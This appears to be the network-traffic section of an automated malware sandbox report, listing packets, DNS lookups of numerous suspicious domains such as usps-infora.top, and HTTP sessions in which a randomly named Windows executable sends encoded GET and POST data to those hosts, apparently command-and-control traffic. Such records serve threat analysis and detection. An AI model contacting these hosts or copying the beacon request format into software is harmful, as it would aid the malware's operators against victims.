Jan 6, 2025 16:05:09.468575954 CET	80	60449	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:09.468682051 CET	80	60449	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:10.969585896 CET	60449	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:11.022352934 CET	80	60449	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:11.986345053 CET	60450	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:11.991344929 CET	80	60450	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:11.991417885 CET	60450	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:12.002791882 CET	60450	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:12.007736921 CET	80	60450	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:25.705543041 CET	80	60447	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:25.705622911 CET	60447	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:28.287775040 CET	80	60448	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:28.293740034 CET	60448	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:30.815149069 CET	80	60449	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:30.815753937 CET	60449	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:33.412693024 CET	80	60450	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:33.412801027 CET	60450	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:33.413872957 CET	60450	80	192.168.2.8	38.22.89.164
Jan 6, 2025 16:05:33.418628931 CET	80	60450	38.22.89.164	192.168.2.8
Jan 6, 2025 16:05:38.447680950 CET	60451	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:38.452929974 CET	80	60451	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:38.453248024 CET	60451	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:38.467684984 CET	60451	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:38.473671913 CET	80	60451	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:39.983139038 CET	60451	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:39.988351107 CET	80	60451	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:39.988420010 CET	60451	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:41.003725052 CET	60452	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:41.008619070 CET	80	60452	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:41.015716076 CET	60452	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:41.027708054 CET	60452	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:41.032597065 CET	80	60452	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:42.530050993 CET	60452	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:42.535222054 CET	80	60452	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:42.535753012 CET	60452	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:43.548317909 CET	60453	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:43.553184032 CET	80	60453	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:43.553284883 CET	60453	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:43.566957951 CET	60453	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:43.571799040 CET	80	60453	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:43.571829081 CET	80	60453	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:45.077255964 CET	60453	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:45.082341909 CET	80	60453	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:45.082480907 CET	60453	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:46.105254889 CET	60454	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:46.110183954 CET	80	60454	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:46.110286951 CET	60454	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:46.123549938 CET	60454	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:46.128653049 CET	80	60454	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:48.793119907 CET	80	60454	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:48.793138027 CET	80	60454	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:48.793150902 CET	80	60454	68.65.122.71	192.168.2.8
Jan 6, 2025 16:05:48.793277025 CET	60454	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:48.793277025 CET	60454	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:48.795945883 CET	60454	80	192.168.2.8	68.65.122.71
Jan 6, 2025 16:05:48.800770044 CET	80	60454	68.65.122.71	192.168.2.8
Jan 6, 2025 16:06:12.153939009 CET	60455	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:12.159882069 CET	80	60455	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:12.162004948 CET	60455	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:12.176666975 CET	60455	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:12.182596922 CET	80	60455	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:12.919878006 CET	80	60455	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:12.920021057 CET	60455	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:15.201915979 CET	60455	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:15.206814051 CET	80	60455	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:16.220722914 CET	60456	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:16.225589037 CET	80	60456	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:16.225770950 CET	60456	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:16.240333080 CET	60456	80	192.168.2.8	103.174.136.137
Jan 6, 2025 16:06:16.245192051 CET	80	60456	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:16.978391886 CET	80	60456	103.174.136.137	192.168.2.8
Jan 6, 2025 16:06:16.978507996 CET	60456	80	192.168.2.8	103.174.136.137

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 16:02:25.410681009 CET	53	64669	1.1.1.1	192.168.2.8
Jan 6, 2025 16:02:38.179276943 CET	60171	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:02:38.196991920 CET	53	60171	1.1.1.1	192.168.2.8
Jan 6, 2025 16:02:53.907658100 CET	62263	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:02:53.979523897 CET	53	62263	1.1.1.1	192.168.2.8
Jan 6, 2025 16:03:07.095411062 CET	61974	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:03:07.214047909 CET	53	61974	1.1.1.1	192.168.2.8
Jan 6, 2025 16:03:15.268030882 CET	54674	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:03:15.289221048 CET	53	54674	1.1.1.1	192.168.2.8
Jan 6, 2025 16:03:28.501614094 CET	56626	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:03:28.789756060 CET	53	56626	1.1.1.1	192.168.2.8
Jan 6, 2025 16:03:42.970937014 CET	52900	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:03:43.043062925 CET	53	52900	1.1.1.1	192.168.2.8
Jan 6, 2025 16:03:56.393413067 CET	50741	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:03:56.407835007 CET	53	50741	1.1.1.1	192.168.2.8
Jan 6, 2025 16:04:09.769959927 CET	62556	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:04:09.790945053 CET	53	62556	1.1.1.1	192.168.2.8
Jan 6, 2025 16:04:23.095618010 CET	50279	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:04:23.321259975 CET	53	50279	1.1.1.1	192.168.2.8
Jan 6, 2025 16:04:37.017436981 CET	62564	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:04:37.277225971 CET	53	62564	1.1.1.1	192.168.2.8
Jan 6, 2025 16:04:50.658412933 CET	56347	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:04:50.735557079 CET	53	56347	1.1.1.1	192.168.2.8
Jan 6, 2025 16:05:03.971340895 CET	56887	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:05:04.325073004 CET	53	56887	1.1.1.1	192.168.2.8
Jan 6, 2025 16:05:38.425940990 CET	50804	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:05:38.440042019 CET	53	50804	1.1.1.1	192.168.2.8
Jan 6, 2025 16:05:53.815694094 CET	50261	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:05:53.825750113 CET	53	50261	1.1.1.1	192.168.2.8
Jan 6, 2025 16:06:01.893958092 CET	58275	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:06:02.265261889 CET	53	58275	1.1.1.1	192.168.2.8
Jan 6, 2025 16:06:10.353391886 CET	64836	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:06:11.358335018 CET	64836	53	192.168.2.8	1.1.1.1
Jan 6, 2025 16:06:12.149506092 CET	53	64836	1.1.1.1	192.168.2.8
Jan 6, 2025 16:06:12.149522066 CET	53	64836	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 16:02:38.179276943 CET	192.168.2.8	1.1.1.1	0xfe72	Standard query (0)	www.biocaracol.online	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:02:53.907658100 CET	192.168.2.8	1.1.1.1	0xc97b	Standard query (0)	www.zucchini.pro	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:07.095411062 CET	192.168.2.8	1.1.1.1	0xf0bc	Standard query (0)	www.yacolca.digital	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:15.268030882 CET	192.168.2.8	1.1.1.1	0x9a01	Standard query (0)	www.ogbos88.cyou	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:28.501614094 CET	192.168.2.8	1.1.1.1	0x24c1	Standard query (0)	www.esscosaathi.info	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:42.970937014 CET	192.168.2.8	1.1.1.1	0xe675	Standard query (0)	www.myfastuploader.sbs	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:56.393413067 CET	192.168.2.8	1.1.1.1	0x30f1	Standard query (0)	www.grimbo.boats	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:09.769959927 CET	192.168.2.8	1.1.1.1	0x143	Standard query (0)	www.sesanu.xyz	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:23.095618010 CET	192.168.2.8	1.1.1.1	0x47ec	Standard query (0)	www.sovz.pro	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:37.017436981 CET	192.168.2.8	1.1.1.1	0x4968	Standard query (0)	www.tabyscooterrentals.xyz	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:50.658412933 CET	192.168.2.8	1.1.1.1	0x76c6	Standard query (0)	www.sql.dance	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:05:03.971340895 CET	192.168.2.8	1.1.1.1	0x77ce	Standard query (0)	www.811371bb10.buzz	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:05:38.425940990 CET	192.168.2.8	1.1.1.1	0xdb2b	Standard query (0)	www.rtp189z.lat	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:05:53.815694094 CET	192.168.2.8	1.1.1.1	0xbce2	Standard query (0)	www.glyttera.shop	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:01.893958092 CET	192.168.2.8	1.1.1.1	0x7c04	Standard query (0)	www.usps-infora.top	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:10.353391886 CET	192.168.2.8	1.1.1.1	0x3c2b	Standard query (0)	www.u75lmwdgp0du.homes	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:11.358335018 CET	192.168.2.8	1.1.1.1	0x3c2b	Standard query (0)	www.u75lmwdgp0du.homes	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 16:02:38.196991920 CET	1.1.1.1	192.168.2.8	0xfe72	No error (0)	www.biocaracol.online		217.160.0.160	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:02:53.979523897 CET	1.1.1.1	192.168.2.8	0xc97b	No error (0)	www.zucchini.pro		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:07.214047909 CET	1.1.1.1	192.168.2.8	0xf0bc	Name error (3)	www.yacolca.digital	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:15.289221048 CET	1.1.1.1	192.168.2.8	0x9a01	No error (0)	www.ogbos88.cyou		104.21.13.141	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:15.289221048 CET	1.1.1.1	192.168.2.8	0x9a01	No error (0)	www.ogbos88.cyou		172.67.132.227	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:28.789756060 CET	1.1.1.1	192.168.2.8	0x24c1	No error (0)	www.esscosaathi.info		15.197.240.20	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:43.043062925 CET	1.1.1.1	192.168.2.8	0xe675	No error (0)	www.myfastuploader.sbs	myfastuploader.sbs		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:03:43.043062925 CET	1.1.1.1	192.168.2.8	0xe675	No error (0)	myfastuploader.sbs		136.243.225.5	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:56.407835007 CET	1.1.1.1	192.168.2.8	0x30f1	No error (0)	www.grimbo.boats		172.67.182.198	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:03:56.407835007 CET	1.1.1.1	192.168.2.8	0x30f1	No error (0)	www.grimbo.boats		104.21.18.171	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:09.790945053 CET	1.1.1.1	192.168.2.8	0x143	No error (0)	www.sesanu.xyz		199.192.21.169	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:23.321259975 CET	1.1.1.1	192.168.2.8	0x47ec	No error (0)	www.sovz.pro		45.130.41.107	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:37.277225971 CET	1.1.1.1	192.168.2.8	0x4968	No error (0)	www.tabyscooterrentals.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:04:37.277225971 CET	1.1.1.1	192.168.2.8	0x4968	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:04:37.277225971 CET	1.1.1.1	192.168.2.8	0x4968	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:04:50.735557079 CET	1.1.1.1	192.168.2.8	0x76c6	No error (0)	www.sql.dance		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:05:04.325073004 CET	1.1.1.1	192.168.2.8	0x77ce	No error (0)	www.811371bb10.buzz	ns91.l4y.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:05:04.325073004 CET	1.1.1.1	192.168.2.8	0x77ce	No error (0)	ns91.l4y.cn		38.22.89.164	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:05:38.440042019 CET	1.1.1.1	192.168.2.8	0xdb2b	No error (0)	www.rtp189z.lat	rtp189z.lat		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:05:38.440042019 CET	1.1.1.1	192.168.2.8	0xdb2b	No error (0)	rtp189z.lat		68.65.122.71	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:05:53.825750113 CET	1.1.1.1	192.168.2.8	0xbce2	Name error (3)	www.glyttera.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:02.265261889 CET	1.1.1.1	192.168.2.8	0x7c04	Name error (3)	www.usps-infora.top	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149506092 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	www.u75lmwdgp0du.homes	tc142-site01.mac-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149506092 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	tc142-site01.mac-cdn.net		103.174.136.137	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149506092 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	tc142-site01.mac-cdn.net		103.174.137.130	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149506092 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	tc142-site01.mac-cdn.net		103.174.136.20	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149522066 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	www.u75lmwdgp0du.homes	tc142-site01.mac-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149522066 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	tc142-site01.mac-cdn.net		103.174.136.137	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149522066 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	tc142-site01.mac-cdn.net		103.174.137.130	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:06:12.149522066 CET	1.1.1.1	192.168.2.8	0x3c2b	No error (0)	tc142-site01.mac-cdn.net		103.174.136.20	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.biocaracol.online

www.zucchini.pro

www.ogbos88.cyou

www.esscosaathi.info

www.myfastuploader.sbs

www.grimbo.boats

www.sesanu.xyz

www.sovz.pro

www.tabyscooterrentals.xyz

www.sql.dance

www.811371bb10.buzz

www.rtp189z.lat

www.u75lmwdgp0du.homes

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	60141	217.160.0.160	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:02:38.217706919 CET	484	OUT	GET /ti8p/?O2ePNNH0=MUDy3YqvL7nJjo7YRvEpL0En2kkl+QSwWlXAA27uESbLrWvg6NI8OA30BxzMmM43Wrbxd+OWoV3ymKsjfu3GM0IEaVa0LxZz/bb5MfRF8Y3qAd/qgVlf6CSQekqVEk5sbw==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.biocaracol.online Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:02:38.854855061 CET	740	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 596 Connection: close Date: Mon, 06 Jan 2025 15:02:38 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	60142	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:02:54.003803968 CET	736	OUT	POST /ajra/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.zucchini.pro Origin: http://www.zucchini.pro Referer: http://www.zucchini.pro/ajra/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 37 72 51 36 68 65 48 42 38 34 54 63 7a 69 32 76 32 54 58 78 67 4c 67 45 56 4b 66 4c 63 4d 49 54 78 70 46 74 6b 63 4d 30 6e 52 64 47 38 71 6b 67 45 61 4e 39 56 42 43 36 44 4f 56 37 69 65 64 65 50 73 77 4a 36 77 71 7a 31 68 36 33 64 4d 76 30 52 43 69 32 76 47 6f 75 6f 6d 51 57 5a 64 45 76 48 4d 7a 4a 2f 68 38 62 48 78 59 39 42 50 48 50 55 50 2f 30 33 6e 74 33 51 70 48 53 4d 39 52 79 4e 31 79 2f 70 32 62 6e 59 4c 62 50 66 6d 63 68 55 77 4e 38 37 35 56 43 68 70 42 65 67 59 39 62 33 36 7a 4c 65 4e 38 7a 73 6e 74 68 38 77 46 55 4b 7a 39 72 58 50 41 37 75 4f 37 72 52 68 2b 7a 47 76 65 2f 4f 65 41 3d Data Ascii: O2ePNNH0=7rQ6heHB84Tczi2v2TXxgLgEVKfLcMITxpFtkcM0nRdG8qkgEaN9VBC6DOV7iedePswJ6wqz1h63dMv0RCi2vGouomQWZdEvHMzJ/h8bHxY9BPHPUP/03nt3QpHSM9RyN1y/p2bnYLbPfmchUwN875VChpBegY9b36zLeN8zsnth8wFUKz9rXPA7uO7rRh+zGve/OeA=
Jan 6, 2025 16:02:54.443603992 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:02:54 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 6010a283-ffae-4bba-977a-9511f877bc0d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zk8DUzYUWOw7OQvCJiw5c3g78z6vccvEwmb/zbzLGC335K62r7Ecud46YaXHGmDZK7pxoulRq0ngHFZNx9hzug== set-cookie: parking_session=6010a283-ffae-4bba-977a-9511f877bc0d; expires=Mon, 06 Jan 2025 15:17:54 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 6b 38 44 55 7a 59 55 57 4f 77 37 4f 51 76 43 4a 69 77 35 63 33 67 37 38 7a 36 76 63 63 76 45 77 6d 62 2f 7a 62 7a 4c 47 43 33 33 35 4b 36 32 72 37 45 63 75 64 34 36 59 61 58 48 47 6d 44 5a 4b 37 70 78 6f 75 6c 52 71 30 6e 67 48 46 5a 4e 78 39 68 7a 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zk8DUzYUWOw7OQvCJiw5c3g78z6vccvEwmb/zbzLGC335K62r7Ecud46YaXHGmDZK7pxoulRq0ngHFZNx9hzug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:02:54.443624973 CET	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjAxMGEyODMtZmZhZS00YmJhLTk3N2EtOTUxMWY4NzdiYzBkIiwicGFnZV90aW1lIjoxNzM2MTc1Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	60143	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:02:56.552115917 CET	756	OUT	POST /ajra/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.zucchini.pro Origin: http://www.zucchini.pro Referer: http://www.zucchini.pro/ajra/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 37 72 51 36 68 65 48 42 38 34 54 63 79 44 47 76 6c 69 58 78 6f 4c 67 48 4a 61 66 4c 57 73 49 58 78 70 4a 74 6b 65 68 2f 6b 6a 4a 47 37 4c 55 67 46 66 74 39 41 42 43 36 49 75 56 69 2f 4f 64 46 50 74 4e 32 36 79 75 7a 31 6c 61 33 64 4d 66 30 52 7a 69 33 74 57 6f 77 6a 47 51 55 64 64 45 76 48 4d 7a 4a 2f 68 35 2b 48 78 67 39 42 63 50 50 56 71 54 33 30 6e 74 30 58 70 48 53 49 39 52 70 4e 31 79 5a 70 33 57 49 59 49 6a 50 66 6b 55 68 56 68 4e 2f 75 4a 56 45 35 4a 41 5a 68 37 35 58 2f 35 4f 70 51 73 38 48 67 56 64 36 30 6d 30 2b 51 52 31 74 55 50 6f 51 75 4e 54 64 55 57 6a 62 63 4d 4f 50 51 